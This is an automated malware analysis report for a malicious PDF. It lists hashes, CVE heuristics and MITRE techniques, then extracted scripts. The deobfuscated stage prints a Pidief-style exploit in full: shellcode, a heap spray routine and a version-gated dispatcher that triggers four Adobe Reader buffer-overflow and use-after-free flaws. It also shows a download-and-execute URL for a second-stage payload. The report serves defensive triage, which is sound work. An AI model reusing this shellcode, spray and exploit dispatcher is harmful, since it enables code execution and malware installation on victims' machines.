Malicious PDF — malware analysis report

Static analysis result for SHA-256 71141e081f4f31b7…

MALICIOUS

PDF

12.0 KB Created: 2010-03-15 18:37:45 First seen: 2026-05-11
MD5: c6f2771f8100d159ac98f93aa9c69637 SHA-1: c68a32b99a5ad633d80a6006a8aeb510c5bd9c79 SHA-256: 71141e081f4f31b7cf7916a4e54a0828b5acb4ec05de62f7300f033081f805db
410 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

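The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL http://exe/95347f.exe?spl=pdf_2014. Note that the host part of this URL is the single label "exe" rather than a fully qualified domain name, so the decoded value may be incomplete or a placeholder; confirm it against the sample before using it as a network indicator. This indicates a malicious document intended to compromise the user's system.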

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://exe/95347f.exe?spl=pdf_2014 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0020_000.js pdf-javascript-stream PDF /JS object 20 at offset 0x28DF 18280 bytes
SHA-256: d2e463110bab5bb7f146957a610f1b345fbd32aa903584199f0a7157dba94cc0
Preview script
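First 1,000 lines of the extracted script
Reading aid: every token below is separated by the same junk block comment ("abeltree"), and API names are assembled from string fragments. The kL fragments concatenate to "unescape", and the z fragments visible before the preview is cut off begin "getPageNum".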
/* 






abeltree


 */          /* 






abeltree


 */  var kL        /* 






abeltree


 */  =        /* 






abeltree


 */  [        /* 






abeltree


 */  ""        /* 






abeltree


 */  ,        /* 






abeltree


 */  "es"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "un"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "pe"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "ca"        /* 






abeltree


 */  ];        /* 






abeltree


 */  r        /* 






abeltree


 */  =        /* 






abeltree


 */  new        /* 






abeltree


 */   String        /* 






abeltree


 */  (        /* 






abeltree


 */  kL        /* 






abeltree


 */  [        /* 






abeltree


 */  2        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  kL        /* 






abeltree


 */  [        /* 






abeltree


 */  1        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  kL        /* 






abeltree


 */  [        /* 






abeltree


 */  4        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  kL        /* 






abeltree


 */  [        /* 






abeltree


 */  3        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  kL        /* 






abeltree


 */  [        /* 






abeltree


 */  0        /* 






abeltree


 */  ]        /* 






abeltree


 */  )        /* 






abeltree


 */  ;        /* 






abeltree


 */          /* 






abeltree


 */  var z        /* 






abeltree


 */  =        /* 






abeltree


 */  [        /* 






abeltree


 */  "rd"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "ge"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "Wo"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "um"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "eN"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "ag"        /* 






abeltree


 */  ,        /* 






abeltree


 */  ""        /* 






abeltree


 */  ,        /* 






abeltree


 */  "tP"        /* 






abeltree


 */  ,        /* 






abeltree


 */  "s"        /* 






abeltree


 */  ];        /* 






abeltree


 */  rS        /* 






abeltree


 */  =        /* 






abeltree


 */  new        /* 






abeltree


 */   String        /* 






abeltree


 */  (        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


 */  1        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


 */  7        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


 */  5        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


 */  4        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


 */  3        /* 






abeltree


 */  ]        /* 






abeltree


 */  +        /* 






abeltree


 */  z        /* 






abeltree


 */  [        /* 






abeltree


…
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3737 bytes
SHA-256: 482a56f31d7d286dd8becff567afe8292c69247e48a1dd84c185c6f2346af730
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://exe/95347f.exe?spl=pdf_2014 */
// Analyst note: _u carries the same URL the report lists under "Embedded URL".
// No function in the visible part of this listing reads _u; get_url() derives
// its value from this.info.author instead.
// NOTE(review): the host is the single label "exe" - confirm the decoded value
// before treating it as a network indicator.
var _u="http://exe/95347f.exe?spl=pdf_2014";
������������������Á�Ã�󁁁��������������������
	// Parallel substitution alphabets consumed by encode_str(): the character at
	// index i of one table is replaced by the character at index i of the other.
	// get_url() passes them in swapped order (dest_table first), i.e. it maps
	// from the dest_table alphabet back to the src_table alphabet.
	// "0" occurs twice in each table; encode_str() uses indexOf, so only the
	// first occurrence is ever matched.
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";
// Global array that x8EvTm() fills with repeated filler+payload strings.
var hwTl9Dn = new Array();  

/**
 * Builds the payload string used by x8EvTm().
 *
 * Concatenates a fixed %u-escaped literal with the value returned by get_url()
 * and passes the result through unescape().
 *
 * @param name Not referenced anywhere in the body.
 * @returns The unescaped string (literal plus appended URL text).
 */
function get_shellcode(name) {

	var u = get_url();
	// The last escapes of the literal (%u6804%u7474%u3A70%u2F2F) carry the ASCII
	// bytes "http://", which is why the decoded URL text is appended directly
	// after it on the next line.
	// NOTE(review): the literal is not disassembled here; the report above
	// describes this stage as downloading and executing a second-stage payload.
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1440%u008B%u008B%u588B%uEB10%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u65B8%u652E%uAB78%u9866%uAB66%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u5231%uB850%u1A36%u702F%u55FF%u5B04%uFF33%u5657%u98B8%u8AFE%uFF0E%u0455%uB857%uCEEF%u60E0%u55FF%u6804%u7474%u3A70%u2F2F";
	s+= u;
	return unescape(s);
}


/**
 * Recovers the download location from document metadata.
 *
 * Reads this.info.author and runs it through encode_str() with the tables in
 * swapped order (dest_table as the lookup alphabet, src_table as the output
 * alphabet), so the stored value is mapped back to plain text.
 *
 * Triage note: the URL text is not present in the script itself, so URL
 * extraction over the JavaScript alone will not find it.
 * NOTE(review): this.info.author is presumably the PDF's Author metadata -
 * check the sample's /Info dictionary to confirm.
 *
 * @returns The substituted string produced by encode_str().
 */
function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};


/**
 * Character-by-character substitution between two alphabets.
 *
 * @param str        Input string.
 * @param src_table  Alphabet each input character is looked up in.
 * @param dest_table Alphabet the replacement character is taken from, at the
 *                   same index.
 * @returns The substituted string. Characters of str that do not occur in
 *          src_table are dropped, so the result can be shorter than the input.
 */
function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		// indexOf returns the first match, so a character that appears twice in
		// src_table always maps through its first position.
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
};


/**
 * Expands a filler string to a requested size.
 *
 * Doubles PDrScZj4 until twice its length is at least ez5pL6, then returns the
 * first ez5pL6 / 2 characters.
 * NOTE(review): the factor of two suggests ez5pL6 is a byte count with two
 * bytes per character - confirm.
 *
 * @param PDrScZj4 Seed string to repeat.
 * @param ez5pL6   Target size; the result holds ez5pL6 / 2 characters.
 * @returns The expanded and truncated string.
 */
function Rq4v1qCC(PDrScZj4, ez5pL6){    

	while (PDrScZj4.length * 2 < ez5pL6){      
		PDrScZj4 += PDrScZj4;    
	}    

	PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2);    return PDrScZj4;  
}  

/**
 * Fills the global array hwTl9Dn with many copies of filler + payload.
 *
 * This is the memory-filling step the report's heuristics refer to as heap
 * spraying. Triage indicators visible here: the constants 0x0c0c0c0c and
 * 0x30303030, a 0x400000 block size, and a %u9090%u9090 filler seed.
 *
 * @param I7T0vko5 Selector: 1 switches the constant from 0x0c0c0c0c to
 *                 0x30303030; any other value keeps the default.
 */
function x8EvTm(I7T0vko5){  

	var qPBt7D = 0x0c0c0c0c;        

	// Assigned without var, so NRjjR6W6 becomes a global.
	NRjjR6W6 = get_shellcode("pdf");

	if (I7T0vko5 == 1){qPBt7D = 0x30303030;}

	// Filler size is the block size minus twice the payload length and a fixed
	// 0x38.
	var FeQq1Vv = 0x400000;   
	var tsSzSc = NRjjR6W6.length * 2;    var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);    
	var PDrScZj4 = unescape("%u9090%u9090");    

	PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);    

	// Number of blocks is derived from the selected constant.
	var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;    

	for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){    
		hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;    
	}
}  

/**
 * Version-gated dispatcher: reads app.viewerVersion and calls the Reader API
 * that the report's heuristics associate with each CVE.
 *
 * The four conditions are independent if statements, not an else-if chain, so
 * more than one branch can run for the same viewer version (for example a
 * version below 8 satisfies both the "< 8" and the "< 9.1" test).
 * IyIFVe is a string; the comparisons against numbers rely on implicit
 * conversion.
 */
function U2UcYKr(){   

var IyIFVe = app.viewerVersion.toString();          

// Branch 1: util.printf with a very wide field-width format - the report maps
// util.printf to CVE-2008-2992.
if (IyIFVe > 8){
	x8EvTm(1);
	var iVvCdy8 = "12999999999999999999";          


for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ){            iVvCdy8 += "8";   
       }          util.printf("%45000f", iVvCdy8);      
}
// Branch 2: Collab.collectEmailInfo with an oversized msg field - mapped by the
// report to CVE-2007-5659.
if (IyIFVe < 8){

	x8EvTm(0);    
	var UNXaCTHb = unescape("%u0c0c%u0c0c");    

	while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;    

	this .collabStore = Collab.collectEmailInfo({        subj : "", msg : UNXaCTHb});      
}       

// Branch 3: Collab.getIcon with a long argument, only when the method exists -
// mapped by the report to CVE-2009-0927.
if (IyIFVe < 9.1){

	if (app.doc.Collab.getIcon)
	{
		x8EvTm(0); 
        var eGREUTNw = unescape("%09");          
		while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;

		eGREUTNw = "N." + eGREUTNw;    

		app.doc.Collab.getIcon(eGREUTNw);   
	}
}   
// Branch 4: media.newPlayer(null) bracketed by two util.printd calls - the
// report maps media.newPlayer to CVE-2009-4324.
if (IyIFVe == 9.2){        
	x8EvTm(1);              
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());           
	try 
	{	
		media.newPlayer(null);              
	} catch(e) 
	{}
	// The empty catch above discards any exception from media.newPlayer, so
	// the viewer shows no script error for that call.
	util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}

}

// Top-level call: the dispatcher runs as soon as this script is evaluated; no
// further trigger is visible in this listing.
U2UcYKr();

���������������󖖃�����������Ã�Ã���À��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������=���������������������������������������������������������������������������������==�<??�da�h